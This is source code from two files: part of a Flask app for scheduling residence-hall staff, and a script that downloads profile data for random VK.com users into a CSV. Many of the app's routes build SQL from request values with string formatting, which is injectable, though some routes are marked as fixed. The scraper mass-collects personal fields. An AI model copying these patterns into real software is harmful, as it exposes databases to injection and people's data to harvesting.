logging.info("Import File: {}".format(request.files))
if 'file' not in request.files:
logging.info("No file part found")
return jsonify(stdRet(0,"No File Part"))
file = request.files['file']
# if user does not select file, browser also
# submit an empty part without filename
if file.filename == '':
logging.info("No File Selected")
return jsonify(stdRet(0,"No File Selected"))
if file and fileAllowed(file.filename):
dataStr = file.read().decode("utf-8")
# Iterate through the rows of the dataStr
# The expected format for the csv contains
# a header row and is as follows:
# First Name, Last Name, Email, Date Started (MM/DD/YYYY), Color, Role
# Example:
# FName, LName-Hyphen, <EMAIL>, 05/28/2020, #OD1E76, RA
logging.debug(dataStr)
cur = conn.cursor()
for row in dataStr.split("\n")[1:]:
if row != "":
pl = [ part.strip() for part in row.split(",") ]
logging.debug("PL: {}".format(pl))
# Do some validation checking
pl, valid, reasons = validateUpload(pl)
if not valid:
ret = stdRet("0","Invalid Formatting")
ret["except"] = reasons
logging.info("Invalid Formatting")
return jsonify(ret)
if pl[-1] == "HD" and userDict["auth_level"] >= 3:
auth = 3
elif pl[-1] == "AHD":
auth = 2
else:
auth = 1
logging.debug(auth)
try:
cur.execute("""
INSERT INTO ra (first_name,last_name,hall_id,date_started,color,email,auth_level)
VALUES ('{}','{}',{},TO_DATE('{}','MM/DD/YYYY'),'{}','{}',{});
""".format(pl[0],pl[1],userDict["hall_id"],pl[3],pl[4],pl[2],auth))
conn.commit()
except psycopg2.IntegrityError: # If the conflict entry already exists
logging.debug("Duplicate RA: {}, rolling back DB changes".format(pl))
conn.rollback() # Rollback last commit so that Internal Error doesn't occur
cur.close()
cur = conn.cursor()
cur.close()
return redirect(url_for(".manStaff"))
else:
logging.info("Unable to Import Staff")
return redirect(url_for(".err",msg="Unable to Import Staff"))
@app.route("/api/getConflicts", methods=["GET"])
@login_required
def getConflicts(monthNum=None,raID=None,year=None,hallId=None):
# API Hook that will get the requested conflicts for a given user and month.
# The month will be given via request.args as 'monthNum' and 'year'.
fromServer = True
if monthNum is None and year is None and hallId is None and raID is None: # Effectively: If API was called from the client and not from the server
monthNum = int(request.args.get("monthNum"))
year = int(request.args.get("year"))
userDict = getAuth() # Get the user's info from our database
hallID = userDict["hall_id"]
raID = userDict["ra_id"]
fromServer = False
logging.debug("Get Conflicts - From Server: {}".format(fromServer))
logging.debug("MonthNum: {}, Year: {}, HallID: {}, raID: {}".format(monthNum, year, hallID, raID))
cur = conn.cursor()
cur.execute("SELECT id FROM month WHERE num = {} AND EXTRACT(YEAR FROM year) = {}".format(monthNum, year))
monthID = cur.fetchone()
if monthID is None:
logging.warning("No month found with Num = {}".format(monthNum))
return jsonify(stdRet(-1,"No month found with Num = {}".format(monthNum)))
else:
monthID = monthID[0]
cur.execute("""SELECT TO_CHAR(day.date, 'YYYY-MM-DD')
FROM conflicts JOIN day ON (conflicts.day_id = day.id)
WHERE conflicts.ra_id = {}
AND day.month_id = {}""".format(raID, monthID, hallID))
ret = [ d[0] for d in cur.fetchall() ]
if fromServer:
return ret
else:
return jsonify({"conflicts":ret})
@app.route("/api/getRAConflicts", methods=["GET"])
@login_required
def getRAConflicts():
userDict = getAuth()
if userDict["auth_level"] < 2: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
hallId = userDict["hall_id"]
raId = request.args.get("raID")
monthNum = request.args.get("monthNum")
year = request.args.get("year")
logging.debug("HallId: {}".format(hallId))
logging.debug("RaId: {}".format(raId))
logging.debug("MonthNum: {}".format(monthNum))
logging.debug("Year: {}".format(year))
logging.debug("RaId == -1? {}".format(int(raId) != -1))
if int(raId) != -1:
addStr = "AND conflicts.ra_id = {};".format(raId)
else:
addStr = ""
logging.debug(addStr)
cur = conn.cursor()
cur.execute("SELECT id FROM month WHERE num = {} AND EXTRACT(YEAR FROM year) = {}".format(monthNum, year))
monthID = cur.fetchone()
if monthID is None:
logging.info("No month found with Num = {}".format(monthNum))
return jsonify(stdRet(-1,"No month found with Num = {}".format(monthNum)))
else:
monthID = monthID[0]
cur.execute("""SELECT conflicts.id, ra.first_name, ra.last_name, TO_CHAR(day.date, 'YYYY-MM-DD'), ra.color
FROM conflicts JOIN day ON (conflicts.day_id = day.id)
JOIN ra ON (ra.id = conflicts.ra_id)
WHERE day.month_id = {}
AND ra.hall_id = {}
{};""".format(monthID, hallId, addStr))
conDates = cur.fetchall()
logging.debug("ConDates: {}".format(conDates))
res = []
for d in conDates:
res.append({
"id": d[0],
"title": d[1] + " " + d[2],
"start": d[3],
"color": d[4]
})
return jsonify(res)
@app.route("/api/getStaffConflicts", methods=["GET"])
@login_required
def getRACons(hallId=None,startDateStr=None,endDateStr=None):
# API Hook that will get the conflicts for a given month and hall.
# The month will be given via request.args as 'start' and 'end'.
# The server will then query the database for the appropriate conflicts.
fromServer = True
if hallId is None and startDateStr is None and endDateStr is None:
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
startDateStr = request.args.get("start").split("T")[0] # No need for the timezone in our current application
endDateStr = request.args.get("end").split("T")[0] # No need for the timezone in our current application
fromServer = False
logging.debug("Get Staff Conflicts - From Server: {}".format(fromServer))
res = []
cur = conn.cursor()
cur.execute("""
SELECT ra.id, ra.first_name, ra.last_name, ra.color, TO_CHAR(day.date, 'YYYY-MM-DD')
FROM conflicts JOIN day ON (conflicts.day_id = day.id)
JOIN ra ON (conflicts.ra_id = ra.id)
WHERE day.date >= TO_DATE('{}', 'YYYY-MM-DD')
AND day.date <= TO_DATE('{}', 'YYYY-MM-DD')
AND ra.hall_ID = {};
""".format(startDateStr, endDateStr, hallId))
rawRes = cur.fetchall()
for row in rawRes:
res.append({
"id": row[0],
"title": row[1] + " " + row[2],
"start": row[4],
"color": row[3]
})
if fromServer:
return rawRes
else:
return jsonify(res)
@app.route("/api/getConflictNums", methods=["GET"])
@login_required
def getNumberConflicts(hallId=None,monthNum=None,year=None):
fromServer = True
if hallId is None and monthNum is None and year is None:
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
monthNum = request.args.get("monthNum")
year = request.args.get("year")
fromServer = False
if userDict["auth_level"] < 2: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
cur = conn.cursor()
cur.execute("""
SELECT ra.id, COUNT(cons.id)
FROM ra LEFT JOIN (
SELECT conflicts.id, ra_id
FROM conflicts JOIN day ON (conflicts.day_id = day.id)
JOIN month ON (month.id = day.month_id)
WHERE month.num = {}
AND EXTRACT(YEAR FROM month.year) = {}
) AS cons ON (cons.ra_id = ra.id)
WHERE ra.hall_id = {}
GROUP BY ra.id;
""".format(monthNum, year, hallId))
res = {}
for row in cur.fetchall():
res[row[0]] = row[1]
if fromServer:
return res
else:
return jsonify(res)
@app.route("/api/getRABreakStats", methods=["GET"])
@login_required
def getRABreakStats(hallId=None,startDateStr=None,endDateStr=None):
# API Hook that will get the RA stats for a given month.
# The month will be given via request.args as 'monthNum' and 'year'.
# The server will then query the database for the appropriate statistics
# and send back a json object.
fromServer = True
if hallId is None and startDateStr is None and endDateStr is None: # Effectively: If API was called from the client and not from the server
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
fromServer = False
startDateStr = request.args.get("start")
endDateStr = request.args.get("end")
logging.debug("Get RA Break Duty Stats - FromServer: {}".format(fromServer))
res = {}
cur = conn.cursor()
cur.execute("""SELECT ra.id, ra.first_name, ra.last_name, COALESCE(numQuery.count, 0)
FROM (SELECT ra.id AS rid, COUNT(break_duties.id) AS count
FROM break_duties JOIN day ON (day.id=break_duties.day_id)
JOIN ra ON (ra.id=break_duties.ra_id)
WHERE break_duties.hall_id = {}
AND day.date BETWEEN TO_DATE('{}', 'YYYY-MM-DD')
AND TO_DATE('{}', 'YYYY-MM-DD')
GROUP BY rid) AS numQuery
RIGHT JOIN ra ON (numQuery.rid = ra.id)
WHERE ra.hall_id = {};""".format(hallId, startDateStr, \
endDateStr, hallId))
raList = cur.fetchall()
for ra in raList:
res[ra[0]] = { "name": ra[1] + " " + ra[2], "count": ra[3] }
cur.close()
if fromServer:
# If this function call is from the server, simply return the results
return res
else:
# Otherwise, if this function call is from the client, return the
# results as a JSON response object.
return jsonify(res)
@app.route("/api/getBreakDuties", methods=["GET"])
@login_required
def getBreakDuties(hallId=None, start=None, end=None, showAllColors=False):
userDict = getAuth()
fromServer = True
if start is None and end is None and hallId is None: # Effectively: If API was called from the client and not from the server
start = request.args.get("start").split("T")[0] # No need for the timezone in our current application
end = request.args.get("end").split("T")[0] # No need for the timezone in our current application
showAllColors = request.args.get("allColors") == "true" # Should all colors be displayed or only the current user's colors
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
fromServer = False
cur = conn.cursor()
cur.execute("""
SELECT ra.first_name, ra.last_name, ra.color, ra.id, TO_CHAR(day.date, 'YYYY-MM-DD')
FROM break_duties JOIN day ON (day.id=break_duties.day_id)
JOIN month ON (month.id=break_duties.month_id)
JOIN ra ON (ra.id=break_duties.ra_id)
WHERE break_duties.hall_id = {}
AND month.year >= TO_DATE('{}','YYYY-MM')
AND month.year <= TO_DATE('{}','YYYY-MM')
""".format(hallId,start,end))
res = []
for row in cur.fetchall():
if not(showAllColors):
# If the desired behavior is to not show all of the unique RA colors
# then check to see if the current user is the ra on the duty being
# added. If it is the ra, show their unique color, if not, show the
# same color.
if userDict["ra_id"] == row[3]:
c = row[2]
else:
c = "#2C3E50"
# If the desired behavior is to show all of the unique RA colors, then
# simply set their color.
else:
c = row[2]
res.append({
"id": row[3],
"title": row[0] + " " + row[1],
"start": row[4],
"color": c,
"extendedProps": {"dutyType":"brk"}
})
if fromServer:
return res
else:
return jsonify(res)
@app.route("/api/addBreakDuty", methods=["POST"])
@login_required
def addBreakDuty():
    """Create a break duty for an RA on a given date.

    Expects a JSON body with "id" (the RA's id), "pts" (the duty's point
    value) and "dateStr" (YYYY-MM-DD). Only users with AHD privileges or
    above (auth_level >= 2) may add break duties.

    CONSISTENCY FIX: @login_required was missing on this route (every
    sibling API route has it), leaving the endpoint open to anonymous
    requests.
    """
    userDict = getAuth()

    data = request.json
    selID = data["id"]
    hallId = userDict["hall_id"]
    ptVal = data["pts"]
    dateStr = data["dateStr"]

    if userDict["auth_level"] < 2:
        # The user is not at least an AHD.
        logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
        return jsonify(stdRet(-1, "NOT AUTHORIZED"))

    cur = conn.cursor()

    # Validate that the RA desired exists and belongs to the same hall.
    # SECURITY FIX: parameterized query instead of str.format (SQL injection).
    cur.execute("SELECT id FROM ra WHERE id = %s AND hall_id = %s;", (selID, hallId))
    raId = cur.fetchone()

    if raId is None:
        cur.close()
        logging.warning("Unable to find RA {} in hall {}".format(selID, hallId))
        # BUG FIX: this branch previously only assigned `ret` and fell
        # through to the success return below; actually report the error.
        return jsonify(stdRet(-1, "Unable to find RA {} in hall {}".format(selID, hallId)))

    # Extract the id from the tuple.
    raId = raId[0]

    # Get the month and day IDs necessary to associate a record in break_duties.
    cur.execute("SELECT id, month_id FROM day WHERE date = TO_DATE(%s, 'YYYY-MM-DD');", (dateStr,))
    dayRow = cur.fetchone()

    # BUG FIX: guard BEFORE unpacking -- `dayID, monthId = cur.fetchone()`
    # raised TypeError whenever the date was missing.
    if dayRow is None:
        # No Day found.
        cur.close()
        logging.warning("Unable to find day {} in database".format(dateStr))
        return jsonify(stdRet(-1, "Unable to find day {} in database".format(dateStr)))

    dayID, monthId = dayRow

    if monthId is None:
        # No month found.
        cur.close()
        logging.warning("Unable to find month for {} in database".format(dateStr))
        return jsonify(stdRet(-1, "Unable to find month for {} in database".format(dateStr)))

    cur.execute("""INSERT INTO break_duties (ra_id, hall_id, month_id, day_id, point_val)
                   VALUES (%s, %s, %s, %s, %s);""", (raId, hallId, monthId, dayID, ptVal))

    conn.commit()
    cur.close()

    logging.info("Successfully added new Break Duty for Hall {} and Month {}".format(hallId, monthId))
    return jsonify(stdRet(1, "successful"))
@app.route("/api/deleteBreakDuty", methods=["POST"])
@login_required
def deleteBreakDuty():
    """Delete a break duty identified by RA name and date.

    Expects a JSON body with "raName" ("First Last") and "dateStr"
    (MM/DD/YYYY). Only users with AHD privileges or above
    (auth_level >= 2) may delete break duties.
    """
    userDict = getAuth()

    data = request.json
    fName, lName = data["raName"].split()
    hallId = userDict["hall_id"]
    dateStr = data["dateStr"]

    if userDict["auth_level"] < 2:
        # The user is not at least an AHD.
        logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
        return jsonify(stdRet(-1, "NOT AUTHORIZED"))

    logging.debug("Deleted Break Duty RA Name: {}".format(fName + " " + lName))
    logging.debug("HallID: {}".format(hallId))
    # Expected as x-x-xxxx
    logging.debug("DateStr: {}".format(dateStr))

    cur = conn.cursor()

    # SECURITY FIX: parameterized queries instead of str.format
    # (the old code interpolated the user-supplied name straight into SQL).
    cur.execute("SELECT id FROM ra WHERE first_name LIKE %s AND last_name LIKE %s AND hall_id = %s;",
                (fName, lName, userDict["hall_id"]))
    raId = cur.fetchone()

    cur.execute("SELECT id, month_id FROM day WHERE date = TO_DATE(%s, 'MM/DD/YYYY');", (dateStr,))
    dayRow = cur.fetchone()
    # BUG FIX: unpacking cur.fetchone() directly raised TypeError when the
    # date did not exist; fall through to the error branch instead.
    dayID, monthId = dayRow if dayRow is not None else (None, None)

    if raId is not None and dayID is not None and monthId is not None:
        cur.execute("""DELETE FROM break_duties
                       WHERE ra_id = %s
                       AND hall_id = %s
                       AND day_id = %s
                       AND month_id = %s""", (raId[0], hallId, dayID, monthId))

        conn.commit()
        cur.close()
        logging.info("Successfully deleted duty")
        return jsonify(stdRet(1, "successful"))

    else:
        cur.close()
        # (typo fix: "beak" -> "break")
        logging.info("Unable to locate break duty to delete: RA {}, Date {}".format(fName + " " + lName, dateStr))
        return jsonify({"status": 0, "error": "Unable to find parameters in DB"})
@app.route("/api/saveHallSettings", methods=["POST"])
@login_required
def saveHallSettings():
    """Save a single hall setting received from the client.

    Expects a JSON body with "name" (the setting's display name) and
    "value" (its new value). Only Hall Directors and above
    (auth_level >= 3) may change hall settings.
    """
    userDict = getAuth()

    # Ensure that the user is at least an HD (auth_level 3).
    if userDict["auth_level"] < 3:
        logging.info("User Not Authorized - RA: {} attempted to overwrite Hall Settings for : {}"
                     .format(userDict["ra_id"], userDict["hall_id"]))
        return jsonify(stdRet(-1, "NOT AUTHORIZED"))

    # Get the name and value of the setting that was changed.
    data = request.json
    setName = data["name"]
    setVal = data["value"]

    logging.debug("Setting Name: {}".format(setName))
    logging.debug("Setting Value: {}".format(setVal))

    cur = conn.cursor()

    # Figure out which setting we are attempting to change and whether
    # it should be handled in a special way.
    if setName == "Residence Hall Name":
        # We are attempting to update the res_hall.name field in the DB.
        # Make sure that the user actually belongs to that hall.
        cur.execute("""SELECT res_hall.id
                       FROM res_hall JOIN ra ON (ra.hall_id = res_hall.id)
                       WHERE ra.id = %s;""", (userDict["ra_id"],))

        dbHallId = cur.fetchone()
        if dbHallId is None:
            # No row means the user/hall relationship is inconsistent --
            # refuse the update rather than guessing.
            cur.close()
            logging.info("User Not Authorized - RA: {} attempted to overwrite Hall Settings for : {}"
                         .format(userDict["ra_id"], userDict["hall_id"]))
            return jsonify(stdRet(0, "NOT AUTHORIZED"))

        else:
            # Otherwise go ahead and update the value.
            logging.info("User: {} is updating Hall Setting: '{}' for Hall: {}".format(userDict["ra_id"],
                         setName, userDict["hall_id"]))
            cur.execute("UPDATE res_hall SET name = %s WHERE id = %s", (setVal, userDict["hall_id"]))
            # BUG FIX: the UPDATE was never committed, so the new hall
            # name silently vanished when the transaction ended.
            conn.commit()
            cur.close()
            return jsonify(stdRet(1, "successful"))

    else:
        # No other settings require special handling yet; placeholder
        # for future implementation.
        cur.close()

    # Return the result back to the client.
    return jsonify(stdRet(1, "successful"))
@app.route("/api/getHallSettings", methods=["GET"])
@login_required
def getHallSettings(hallId=None):
    """Return the list of settings for the desired hall.

    Callable internally (hallId supplied -> raw list returned) or as the
    /api/getHallSettings endpoint (hallId taken from the session user ->
    JSON response). The endpoint requires Hall Director privileges
    (auth_level >= 3).
    """
    fromServer = True
    if hallId is None:  # Effectively: the API was called from the client
        userDict = getAuth()  # Get the user's info from our database
        hallId = userDict["hall_id"]
        fromServer = False

        # BUG FIX: this auth check must live inside the client branch --
        # when the function is called from the server with an explicit
        # hallId, userDict was never defined and the old top-level check
        # raised a NameError.
        if userDict["auth_level"] < 3:
            logging.info("User Not Authorized - RA: {} attempted to get Hall Settings".format(userDict["ra_id"]))
            return jsonify(stdRet(-1, "NOT AUTHORIZED"))

    logging.debug("Retrieving Hall Setting information for Hall: {}, From Server: {}".format(hallId, fromServer))

    # Build up the list of settings that will be returned.
    settingList = []
    cur = conn.cursor()

    # Get the hall name.
    cur.execute("SELECT name FROM res_hall WHERE id = %s", (hallId,))
    tmp = {"settingName": "Residence Hall Name",
           "settingDesc": "The name of the Residence Hall.",
           "settingVal": cur.fetchone()[0]}
    settingList.append(tmp)

    # Report whether a Google Calendar account has been connected.
    cur.execute("""SELECT EXISTS
                      (SELECT token
                       FROM google_calendar_info
                       WHERE res_hall_id = %s)""", (hallId,))
    tmp = {"settingName": "Google Calendar Integration",
           "settingDesc": "Connecting a Google Calendar account allows AHDs and HDs to export a given month's duty schedule to Google Calendar.",
           "settingVal": "Connected" if cur.fetchone()[0] else "Not Connected"}
    settingList.append(tmp)

    cur.close()
    if fromServer:
        return settingList
    else:
        return jsonify(settingList)
# -- Integration Methods --
def createGoogleCalendar(calInfoId):
    """Create a secondary Google Calendar for the hall tied to calInfoId.

    Looks up the hall's pickled OAuth token in google_calendar_info, asks
    the Google Calendar interface to create a calendar with it, and
    stores the resulting calendar_id back on the same row.

    Returns a stdRet dict (status 1 on success, -1 if no token exists) so
    that callers can inspect result["status"].
    """
    cur = conn.cursor()

    logging.debug("Searching for the Hall's Calendar Information")
    cur.execute("SELECT token FROM google_calendar_info WHERE id = %s",
                (calInfoId,))
    memview = cur.fetchone()

    # Check to see if we got a result.
    if memview is None:
        logging.info("No Google Calendar token found for Id: {}".format(calInfoId))
        # BUG FIX: previously returned jsonify(...), a Flask Response, but
        # callers index the result like a dict (res["status"]) -- return
        # the plain stdRet dict instead.
        return stdRet(-1, "No Token Found")

    # If there is a token in the DB it is returned as a MemoryView.
    logging.debug("Converting Google Calendar Token to pickle")

    # Wrap the raw token bytes in a BytesIO so pickle can stream from it.
    tmp = BytesIO(memview[0])

    # Unpickle into a google.oauth2.credentials.Credentials object.
    token = pickle.load(tmp)

    logging.debug("Creating Google Calendar")
    calId = gCalInterface.createGoogleCalendar(token)

    logging.debug("Updating Google Calendar Information")

    # Record the new calendar_id on the hall's google_calendar_info row.
    cur.execute("""UPDATE google_calendar_info
                   SET calendar_id = %s
                   WHERE id = %s""", (calId, calInfoId))
    conn.commit()

    return stdRet(1, "Successful")
@app.route("/int/GCalRedirect", methods=["GET"])
@login_required
def returnGCalRedirect():
    """Redirect the user to the Google Calendar authorization page.

    Requires Hall Director privileges (auth_level >= 3). Generates an
    OAuth authorization URL, records the accompanying state token in
    google_calendar_info so the asynchronous response can be matched
    back to this hall, then redirects the browser to Google.
    """
    userDict = getAuth()

    # Make sure the user is at least a Hall Director.
    if userDict["auth_level"] < 3:
        logging.info("User Not Authorized - RA: {} attempted to connect Google Calendar for Hall: {} -G"
                     .format(userDict["ra_id"],userDict["hall_id"]))
        return jsonify(stdRet(-1, "NOT AUTHORIZED"))

    # Get the authorization url and state from the Google Calendar Interface.
    authURL, state = gCalInterface.generateAuthURL(HOST_URL + "/int/GCalAuth")

    # Create the DB cursor object.
    cur = conn.cursor()

    logging.debug("Checking for previously associated calendar for Hall: {}".format(userDict["hall_id"]))

    # Check to see if a Google Calendar has been associated with the given hall.
    # The stored auth_state is what ties the incoming authorization response
    # back to this hall.
    cur.execute("SELECT id FROM google_calendar_info WHERE res_hall_id = %s",
                (userDict["hall_id"], ))
    res = cur.fetchone()

    # If there is not a calendar associated with the hall...
    if res is None:
        # ...then insert a new row.
        logging.debug("Insert new row into Google Calendar Info table")
        cur.execute("""INSERT INTO google_calendar_info (res_hall_id, auth_state)
                       VALUES (%s, %s)""", (userDict["hall_id"], state))
    else:
        # Otherwise update the entry for the appropriate hall with the current state.
        logging.debug("Updating previous Google Calendar Info Row: {}".format(res[0]))
        cur.execute("UPDATE google_calendar_info SET auth_state = %s WHERE id = %s",
                    (state, res[0]))

    logging.debug("Committing auth state to DB for Hall: {}".format(userDict["hall_id"]))
    conn.commit()

    # Redirect the user to the Google Authorization URL.
    return redirect(authURL)
@app.route("/int/GCalAuth", methods=["GET"])
@login_required
def handleGCalAuthResponse():
    """Handle Google's OAuth redirect: save credentials and create the calendar.

    Matches the returned "state" query parameter to the hall that began
    the flow, pickles the received credentials into that hall's
    google_calendar_info row, then creates the secondary calendar.
    Requires Hall Director privileges (auth_level >= 3).
    """
    # Get the user's information.
    userDict = getAuth()

    # Ensure that the user is at least a Hall Director.
    if userDict["auth_level"] < 3:
        logging.info("User Not Authorized - RA: {} attempted to connect Google Calendar for Hall: {} -R"
                     .format(userDict["ra_id"],userDict["hall_id"]))
        return jsonify(stdRet(-1, "NOT AUTHORIZED"))

    # Get the state that was passed back by the authorization response.
    # This is used to map the request to the response.
    state = request.args.get("state")
    logging.debug("Found state in request")

    # Create DB cursor object.
    cur = conn.cursor()

    # Identify which hall maps to the state.
    logging.debug("Searching for hall associated with state")
    cur.execute("SELECT id FROM google_calendar_info WHERE auth_state = %s", (state,))
    calInfoId = cur.fetchone()

    # Check to see if we have a result; an unknown state means the
    # request did not originate from our redirect flow.
    if calInfoId is None:
        logging.debug("Associated hall not found")
        return jsonify(stdRet(-1, "Invalid State Received"))

    # Get the credentials from the Google Calendar Interface.
    creds = gCalInterface.handleAuthResponse(request.url, HOST_URL + "/int/GCalAuth")
    logging.debug("Received user credentials from interface")

    # Create BytesIO to hold the pickled credentials.
    tmp = BytesIO()

    # Dump the pickled credentials into the BytesIO.
    pickle.dump(creds, tmp)

    # Set the read position back to the beginning of the buffer.
    # Without doing this, pickle.load will get an EOF error.
    tmp.seek(0)
    logging.debug("Created credential pickle")

    # Store the credentials on the hall's row and clear the one-shot
    # auth_state. NOTE: this UPDATE is committed (or rolled back) below
    # together with the calendar creation, on the shared connection.
    cur.execute("""UPDATE google_calendar_info
                   SET token = %s ,
                       auth_state = NULL
                   WHERE id = %s;""",
                (tmp.getvalue(), calInfoId[0]))

    logging.debug("Committing credentials to DB for Google Calendar Info: {}".format(calInfoId[0]))
    res = createGoogleCalendar(calInfoId[0])

    # If the calendar creation failed...
    if res["status"] < 0:
        # ...then roll back the Google Calendar connection.
        logging.warning("Unable to Create Google Calendar- Rolling back changes")
        conn.rollback()
    else:
        # Otherwise commit the stored credentials and calendar id.
        logging.debug("Adding newly created Calendar Id to DB")
        logging.info("Google Calendar Creation complete for Hall: {}".format(userDict["hall_id"]))
        conn.commit()

    # Return the user back to the Manage Hall page.
    return redirect(url_for("manHall"))
@app.route("/int/disconnectGCal", methods=["GET"])
@login_required
def disconnectGoogleCalendar():
    """Disconnect the Google Calendar associated with the user's hall.

    Requires Hall Director privileges (auth_level >= 3). Removes the
    hall's google_calendar_info record and returns the user to the
    Manage Hall page.
    """
    userDict = getAuth()

    # Make sure the user is at least a Hall Director.
    if userDict["auth_level"] < 3:
        logging.info("User Not Authorized - RA: {} attempted to disconnect Google Calendar for Hall: {} -G"
                     .format(userDict["ra_id"], userDict["hall_id"]))
        return jsonify(stdRet(-1, "NOT AUTHORIZED"))

    cur = conn.cursor()

    # Delete the google_calendar_info record for the appropriate hall.
    cur.execute("DELETE FROM google_calendar_info WHERE res_hall_id = %s;", (userDict["hall_id"], ))
    # BUG FIX: the DELETE was never committed, so the calendar connection
    # silently reappeared once the transaction ended.
    conn.commit()
    cur.close()

    # Redirect the user back to the Manage Hall page.
    return redirect(url_for("manHall"))
@app.route("/api/exportToGCal", methods=["GET"])
@login_required
def exportToGCal():
    """Export a month's duty schedule to the hall's Google Calendar.

    Reads "monthNum" and "year" from the query string, gathers both the
    regular and break duty schedules for that span, and pushes them to
    Google Calendar via the gCalInterface. Requires AHD privileges or
    above (auth_level >= 2).
    """
    # Get the user's information.
    userDict = getAuth()

    # Ensure that the user is at least an AHD.
    if userDict["auth_level"] < 2:
        logging.info("User Not Authorized - RA: {} attempted to export schedule to Google Calendar"
                     .format(userDict["ra_id"]))
        return jsonify(stdRet(-1, "NOT AUTHORIZED"))

    logging.info("Attempting to export Schedule to Google Calendar")

    # Get the Google Calendar credentials from the DB.
    logging.debug("Retrieving Google Calendar info from DB for Hall: {}".format(userDict["hall_id"]))
    cur = conn.cursor()
    cur.execute("SELECT calendar_id, token FROM google_calendar_info WHERE res_hall_id = %s",
                (userDict["hall_id"], ))
    res = cur.fetchone()

    # Check to see if we got a result.
    if res is None:
        logging.info("No Google Calendar token found for Hall: {}".format(userDict["hall_id"]))
        return jsonify(stdRet(-1, "No Token Found"))
    else:
        # Split the result into its components.
        gCalId, memview = res
        logging.debug("GCalId: {}".format(gCalId))

        # If there is a token in the DB it will be returned as a MemoryView.
        # NOTE(review): if the row exists but the token column is NULL,
        # memview is None and BytesIO(None) below raises -- confirm rows
        # always carry a token before relying on this path.
        # Convert the memview object to a BytesIO object.
        tmp = BytesIO(memview)

        # Unpickle into a google.oauth2.credentials.Credentials object.
        token = pickle.load(tmp)

    logging.debug("Google Calendar information found.")

    # Get the month/schedule information from the request args
    # and create the start and end strings.
    monthNum = int(request.args.get("monthNum"))
    year = int(request.args.get("year"))
    start = formatDateStr(1, monthNum, year)
    end = formatDateStr(calendar.monthrange(year, monthNum)[-1], monthNum, year)
    logging.debug("Retrieving schedule information for MonthNum: {} and Year: {}".format(monthNum, year))

    # Get the appropriate regular-duty schedule from the DB
    # (leverages the existing server-callable API).
    regSched = getSchedule2(start=start, end=end,
                            hallId=userDict["hall_id"], showAllColors=True)

    # Get the appropriate break-duty schedule from the DB
    # (leverages the existing server-callable API).
    breakSched = getBreakDuties(start=start, end=end,
                                hallId=userDict["hall_id"], showAllColors=True)

    logging.debug("Exporting schedule to Google Calendar.")
    # Pass the combined regular and break duty schedule to the Integratinator to be exported.
    status = gCalInterface.exportScheduleToGoogleCalendar(token, gCalId, regSched + breakSched)

    # If the export failed...
    if status < 0:
        # ...log the error code for future reference.
        logging.warning("Error: {} encountered while exporting to Google Calendar for Hall: {}".format(status, userDict["hall_id"]))
        # The user will need to connect/reconnect their Google Calendar account.
        return jsonify(stdRet(0, "Reconnect Google Calendar Account"))

    # Otherwise report that it was a success!
    return jsonify(stdRet(1, "successful"))
# -- Error Handling --
@app.route("/error/<string:msg>")
def err(msg):
    """Render the generic error page displaying the supplied message."""
    logging.warning("Rendering error page with Message: {}".format(msg))
    page = render_template("error.html", errorMsg=msg)
    return page
if __name__ == "__main__":
    # BUG FIX: bool() on any non-empty string is True, so even
    # USE_ADHOC="False" enabled ad-hoc SSL, and a missing variable raised
    # KeyError. Parse the flag explicitly and tolerate it being unset.
    local = os.environ.get("USE_ADHOC", "").lower() in ("1", "true", "yes")
    if local:
        # Local development: self-signed ("adhoc") cert plus debug mode.
        app.run(ssl_context="adhoc", debug=True, host='0.0.0.0')
    else:
        app.run()
|
<reponame>alexeyknorre/PyVK
# -*- coding: utf-8 -*-
"""
Script for downloading, parsing and saving to CSV public user data from VK.com.
"""
import os
import csv
import random
import requests
import ast
# Input variables
basic_parameters = ["uid", "first_name", "last_name"]
result_file = "../results/profiles.csv"
response_file = "../results/response.txt"
#parameters = ""
parameters = "sex, bdate, country, city, deactivated, last_seen, has_mobile, site, education, universities, schools, status, relatives, relations, personal, career, contacts, exports, relation, connections, exports, wall_comments, activities, interests, music, movies, tv, books, games, about, quotes, has_photo, can_post, can_see_all_posts, can_see_audio, can_write_private_message, can_send_friend_request, followers_count"
### CODE
# Main functions
def vk2csv(number_of_ids, result_file=result_file, parameters=parameters,
           response_file=response_file, delete_response=False):
    """Download public VK profiles and save them to a CSV file.

    number_of_ids may be an explicit list of user ids, or an int giving
    how many random ids to sample. The ids used are recorded in
    ../results/ids.txt, raw API responses are appended to response_file,
    and the parsed rows are written to result_file.
    """
    if not isinstance(number_of_ids, list):
        ids = random_ids(number_of_ids)
    else:
        ids = number_of_ids

    # Keep a record of exactly which ids were queried.
    with open("../results/ids.txt", 'w') as ids_log:
        ids_log.write(str(ids))

    get_data(ids, parameters, response_file)
    process_data(result_file, response_file, delete_response)
# Selecting random ids to parse
def random_ids(n):
    """Return up to *n* unique random VK user ids.

    Draws n ids uniformly from the valid id range; duplicates are then
    removed, so the result may contain fewer than n entries.
    """
    draws = [random.randint(1, 327633900) for _ in range(n)]
    # Deduplicate (result order is not meaningful to callers).
    return list(set(draws))
# Getting data from server. Chunk query with cooldown and repeat in case of SSL fail are implemented
def get_data(ids, parameters, response_file, threshold=200):
    """Query the VK users.get API for the given ids and append the raw
    responses to response_file.

    Requests are batched ``threshold`` ids at a time, and each chunk is
    retried on failure.

    NOTE(review): the retry uses a bare ``except`` with unbounded
    recursion -- a persistent network failure would recurse until the
    stack limit; consider a bounded loop catching specific exceptions.
    """
    def query(response):
        # One users.get call for the ids accumulated in str_ids
        # (str_ids ends with a trailing comma, hence the [:-1]).
        try:
            response = requests.get("https://api.vk.com/method/users.get?user_ids=" + str_ids[:-1] +
                                    "&fields=" + parameters).json()
        except:
            # Any failure (SSL, timeout, ...) triggers a retry.
            print("Got error on " + str(count) + " profiles, repeating...")
            response = query(response)
        return response

    #print("Quering VK API...")
    str_ids = ""
    count = 0
    response = []
    for i in ids:
        str_ids += str(i) + ","
        count += 1
